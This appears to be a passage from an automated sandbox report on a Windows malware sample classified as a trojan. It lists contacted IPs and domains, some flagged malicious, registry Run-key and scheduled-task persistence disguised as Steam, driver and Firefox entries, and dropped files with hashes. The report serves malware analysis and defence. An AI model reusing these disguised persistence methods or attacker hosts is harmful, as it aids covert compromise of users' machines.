http://schemas.xmlsoap.org/soap/envelope/	svchost.exe, 0000000A.00000003.318701895.00000159C295E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.291713284.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313395625.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303341556.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318361748.00000159C2956000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296769107.00000159C2960000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302843963.00000159C226C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303134586.00000159C226D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302988191.00000159C226C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.418066269.00000159C295E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305499944.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303061026.00000159C226D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318751449.00000159C2960000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.625746150.00000159C2961000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318640163.00000159C295B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303206364.00000159C226C000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/scp	svchost.exe, 0000000A.00000003.313395625.00000159C295F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	svchost.exe, 0000000A.00000003.302900762.00000159C30AD000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296810811.00000159C2994000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303422350.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307843725.00000159C2969000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.311134418.00000159C295A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296794174.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314568357.00000159C2990000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.418367363.00000159C2956000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/scg	svchost.exe, 0000000A.00000002.619035755.00000159C2913000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000E.00000002.308642618.000002DD32842000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308085043.000002DD32841000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS	svchost.exe, 0000000A.00000003.302377487.00000159C298A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294135803.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296740926.00000159C299A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302529199.00000159C2956000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299823856.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299709872.00000159C2907000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293559312.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299695905.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296497058.00000159C2992000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299733058.00000159C295B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299941137.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293513069.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.306871595.00000159C2958000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293788329.00000159C2969000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302735266.00000159C298A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302304092.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.311134418.00000159C295A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID	svchost.exe, 0000000A.00000002.626150434.00000159C306A000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000E.00000003.307882060.000002DD32861000.00000004.00000001.sdmp	false		high
http://schemas.microso	svchost.exe, 0000000A.00000003.382595017.00000159C2948000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2	svchost.exe, 0000000A.00000003.307401572.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307768227.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.300132751.00000159C2954000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA	svchost.exe, 0000000A.00000003.296695303.00000159C2970000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPF	svchost.exe, 0000000A.00000003.303341556.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305499944.00000159C295F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tb	svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.311134418.00000159C295A000.00000004.00000001.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	svchost.exe, 0000000A.00000003.314568357.00000159C2990000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.579083943.00000159C2294000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	svchost.exe, 0000000A.00000003.296662494.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302354748.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302368744.00000159C295E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302820181.00000159C2990000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293743743.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296835012.00000159C2958000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297231335.00000159C295A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://dhttp://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	svchost.exe, 0000000A.00000003.312027392.00000159C2950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://signup.live.com/signup.aspx	svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298372199.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281662678.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.569053801.00000159C2243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297053072.00000159C30C8000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297114349.00000159C30C8000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.135.233.182	host-data-coin-11.com	Russian Federation	49392	ASBAXETNRU	false
194.147.84.248	patmushta.info	Russian Federation	61400	NETRACK-ASRU	false
188.166.28.199	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
54.38.220.85	unicupload.top	France	16276	OVHFR	false
52.101.24.0	microsoft-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.38.221	goo.su	United States	13335	CLOUDFLARENETUS	false
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
185.233.81.115	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	true
185.7.214.171	unknown	France	42652	DELUNETDE	true
162.159.129.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
185.186.142.166	unknown	Russian Federation	204490	ASKONTELRU	true
141.8.194.74	a0621298.xsph.ru	Russian Federation	35278	SPRINTHOSTRU	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	552870
Start date:	13.01.2022
Start time:	20:48:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 8s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	emPJndhuvA.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@61/41@91/14
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 47.1% (good quality ratio 38%) Quality average: 64.9% Quality standard deviation: 38.2%
HCA Information:	Successful, ratio: 95% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.190.154.19, 40.126.26.134, 20.190.154.18, 20.190.154.137, 20.190.154.136, 20.190.154.139, 20.190.154.16, 20.190.154.17, 20.190.160.8, 20.190.160.4, 20.190.160.71, 20.190.160.132, 20.190.160.2, 20.190.160.73, 20.190.160.75, 20.190.160.134, 96.16.143.41, 96.16.150.73, 20.42.65.92, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 13.89.179.12 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, authgfx.msa.akadns6.net, go.microsoft.com, login.live.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, yandex.ru, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, clientconfig.passport.net, microsoft.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:49:38	API Interceptor	2x Sleep call for process: svchost.exe modified
20:50:15	Task Scheduler	Run new task: Firefox Default Browser Agent BF39D970AE7F435F path: C:\Users\user\AppData\Roaming\tiftjuh
20:50:34	API Interceptor	1x Sleep call for process: FD2B.exe modified
20:50:54	API Interceptor	1x Sleep call for process: WerFault.exe modified
20:50:55	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
20:51:22	API Interceptor	1x Sleep call for process: explorer.exe modified
20:51:23	Task Scheduler	Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
20:51:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
20:51:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
20:52:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
20:52:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12703
Entropy (8bit):	5.664727316652114
Encrypted:	false
SSDEEP:	192:Tu8vk5/2HBw1tY3LZC7URIwKZ1bSvHSm5128Zil7Or5QwhJlAi:Tu8+2xZJRIwKZzm5yKFX
MD5:	0516512FF97C0F1DF67ED56A848B02A9
SHA1:	F50B8012260B8085EE1F350F78D8F3D24FB4F5EF
SHA-256:	41BE64D933BE2102AB9651C6478959EDB3763A7AA7B32E4E086150F7F13CE7A0
SHA-512:	CE06CA9414EF56987D45D43253DA96B53074BFED48DC4383AAF8EFC78CC3EEF2B982738CC7AEF9E3F750A2F55EF14EEED3F077026ADDC07C4D01D36BFB3A767C
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="us-ascii"?><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><cfg:Configuration version="1.1" xmlns:cfg="http://schemas.microsoft.com/Passport/PPCRL"> .. When a certificate is rev'd, a line like the following should be .. added to the cfg:Settings section:.. <cfg:Certificate expired="true">SLCA_BACKUP.CER</cfg:Certificate>.. --><cfg:Settings><cfg:DeviceDNSSuffix>.devicedns.live.com</cfg:DeviceDNSSuffix><cfg:ResolveTimeout>120000</cfg:ResolveTimeout><cfg:ConnectTimeout>60000</cfg:ConnectTimeout><cfg:SendTimeout>30000</cfg:SendTimeout><cfg:ReceiveTimeout>30000</cfg:ReceiveTimeout><cfg:MinMinutesBetweenMetaConfigCheck>1440</cfg:MinMinutesBetweenMetaConfigCheck><cfg:ConfigServerSslURI>https://go.microsoft.com/fwlink/?LinkId=859524</cfg:ConfigServerSslURI><cfg:DIDCOMMetaData><cfg:DIDWithAuth>1</cfg:DIDWithAuth><cfg:AssocPDIDToLDID>1</cfg:AssocPDIDToLDID><cfg:Protocol><cfg:CLSID>{1C109E4C-2F30-4EA3-A57A-A290877A2303}</cfg:CLSID><cfg:DATA

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24860541449255014
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4X:BJiRdwfu2SRU4X
MD5:	AA6BB71586A207C1805C93957AA30AD9
SHA1:	4DFEE4DC837378A57D1CDD209B6B65A1CEE6695F
SHA-256:	442E88CC083C574C0BC33DAAD27CBEC794D2BBCD6E9389807B3BDA866ADAE862
SHA-512:	2F0DF0E36BAD852287F4E96669D6E6BCFF71EACD912F2D05096DCFC7754D8EBF4EBA481216552068BFDA8453CD7A221EFA3E36877DA7C697AA8489F0D3649333
Malicious:	false
Reputation:	unknown
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa30397f4, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2507428048063614
Encrypted:	false
SSDEEP:	384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
MD5:	7D10996D49DA5170622F111A8DB3B34C
SHA1:	0C045A3F8BA0C37DC286E381377A6D043864301E
SHA-256:	6182B373F28CCD8B703A8CD8E6E05EBF41DADE4901523196E0678272D1560E93
SHA-512:	15DD1652FC6408931EB4B2463D5C7976D430F1E05A150778BA40B91C56BE28701ADA03400D0300C048495C47CD543CDF6F99737C065B05693313E1649F96B30B
Malicious:	false
Reputation:	unknown
Preview:	....... ................e.f.3...w........................&..........w..&1...z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.........................................................................................................................................................................................................................................<&1...z..................T..&1...z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07693191266980651
Encrypted:	false
SSDEEP:	3:C/7EvD47p+/tc8l/bJdAtiS9WApllllAll3Vkttlmlnl:Sif/i8t4pWMA3
MD5:	72AACDA5BA34A1204B0E1761FB516F25
SHA1:	1770B3792BD62164797B8463286B18D7ECA1D5CA
SHA-256:	FF7F15C485345CD656ED4496922F6EB2D137C044D1BC8CC242FF12383B127712
SHA-512:	04332DA807E7F6956F9C3C1E2373235D002F6741CEE8D030D9703FBCA08A9703548512D871F95BC2C75F242EA9A5F520789C152C571ECE838EAE7D8DD94DAC28
Malicious:	false
Reputation:	unknown
Preview:	rW.N.....................................3...w..&1...z.......w...............w.......w....:O.....w..................T..&1...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2819.exe_886dfb69803377da97d7c95cea5f58e4d54dd88_79c6d167_161f0920\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.813185051222203
Encrypted:	false
SSDEEP:	96:gJFibve1tLzH6/OQoJ7R3V6tpXIQcQec6tycEfcw3e+HbHg/8BRTf3o8Fa9iVfO5:kavazHN8HQ0lTjIq/u7sOS274Itn
MD5:	5DF816B307E5ED55ACEAE1818BF188C9
SHA1:	A2ECBBBDDEE5600524BF87EB68FF5599B32ED568
SHA-256:	E1659F9E3DBA19433F8BF949C621B590C6CFEC74710E63F2397FFF35F30EECAC
SHA-512:	6A171D4BE7C64A891ABD201851D68112132FEA330990FF28B8C7C5F7CE10BD5CE8A988DE9EC1E37D405E8E9470C911274DD0538FF0169E666EE0310DA78B1BB8
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.0.9.4.3.2.3.6.2.8.2.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.0.9.4.5.1.3.1.5.9.1.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.7.e.f.b.f.c.-.8.e.6.7.-.4.f.3.c.-.9.e.0.3.-.2.c.3.0.4.d.a.5.8.b.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.4.d.7.4.a.9.-.5.4.6.3.-.4.d.1.8.-.a.c.1.d.-.d.3.b.7.1.3.1.9.e.5.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.8.1.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.2.0.-.0.0.0.1.-.0.0.1.6.-.b.b.0.c.-.b.2.3.b.0.2.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.b.0.f.c.3.5.0.f.c.0.2.c.2.e.a.2.2.b.0.8.4.8.e.c.d.c.6.6.3.5.0.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.2.8.1.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D44.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jan 14 04:50:35 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	36668
Entropy (8bit):	2.120563142372381
Encrypted:	false
SSDEEP:	192:DaATNpst2Oeh0GHpTvML8S9JYzF7YBJPhfO1Fopz:CjeJh0LLo2BFhjz
MD5:	79EB4C3C1720452CFE290A77CC582C28
SHA1:	C9C73BE51B4919D7009C4AD29237379F508878D2
SHA-256:	A284AC58B9B88A70B6A7A0B3FE4B428E664E59E039F2BE9DEACF9D4C8333EFC0
SHA-512:	061894FDBFAC7FD90291909E767D191B28F6BFCF9158EEA604B6503CEBA18644EEC09CE7DF693D5080CC4CB0F2E4C04DD1CC9EADE62C38A9A5A75B3243B9C16B
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ..........a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T....... ......a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D14.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8390
Entropy (8bit):	3.700961067644554
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiQSd6tRsQ6YIDSUUzgmfzRSiAzCpDL89bY8sf7vZIm:RrlsNiX6tRsQ6YcSUigmfzRSiAfYPf77
MD5:	FCA0AA267BB33A0A3C78DD00C7E53FB2
SHA1:	F4F2EFF771E4C3D5DD85CA69F32C61F958DCEE41
SHA-256:	F38C651573C980EA18F20245643CA2D7B980FCEEADE83743C38F737F3BE70247
SHA-512:	409D12B28966F71B1E4E2A2A298AEDFE2DF489879F27CB2882D246EC1BEC7139B2C8BF691D84E3D7B471C54C79F91638B5A38EE0597067C54D9DC99881E51DD7
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.0.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5487.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4685
Entropy (8bit):	4.4709404462914755
Encrypted:	false
SSDEEP:	48:cvIwSD8zskJgtWI9DrWSC8Bqs8fm8M4J98qFE+q8vs8p3fgtYd:uITfiAaSNsRJOKffgtYd
MD5:	3F3A356F56D6A4533FAE911FD1906421
SHA1:	03AE9A922F06A240D9DF2F55307883508317AD08
SHA-256:	6885066DFF181A511EB79B1E7932E547CB4A0539677422F5EF41B6DA93805D04
SHA-512:	87920C710F33B65101A1A9FCFDE875D147D30EAAC545C3D1DA990446EDE7F4FFEB25E5F687AE1EBACD32045220D2E452FED6571338055ABCB0FFE748EA35BF54
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341481" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	55410
Entropy (8bit):	3.051722069493437
Encrypted:	false
SSDEEP:	1536:0fHLHUn24ZROzw2qZvCdqQoLbFrIKv4FnEFiaqvMiZIYPTL0:0fHLHUn24ZROzw2qZvCdqQoPFrIKv4FA
MD5:	F0398FDA44063007178B1E5A94776196
SHA1:	37CAF4B9C45DEFB483495C539A515EAD03AA87CF
SHA-256:	7A4E4081A72A8BCD8968C217133BD66B7E5E88E8B457D8CD10391EE938632AE9
SHA-512:	AC19D75FEC3926FDA5C623F6D4F98E1ED8C292E1955C72143031E52D06ECF52E2CBF378AC8943DA463BA02442F9D093CCAF9BCD93BC4B7CB45965A97FA758B76
Malicious:	false
Reputation:	unknown
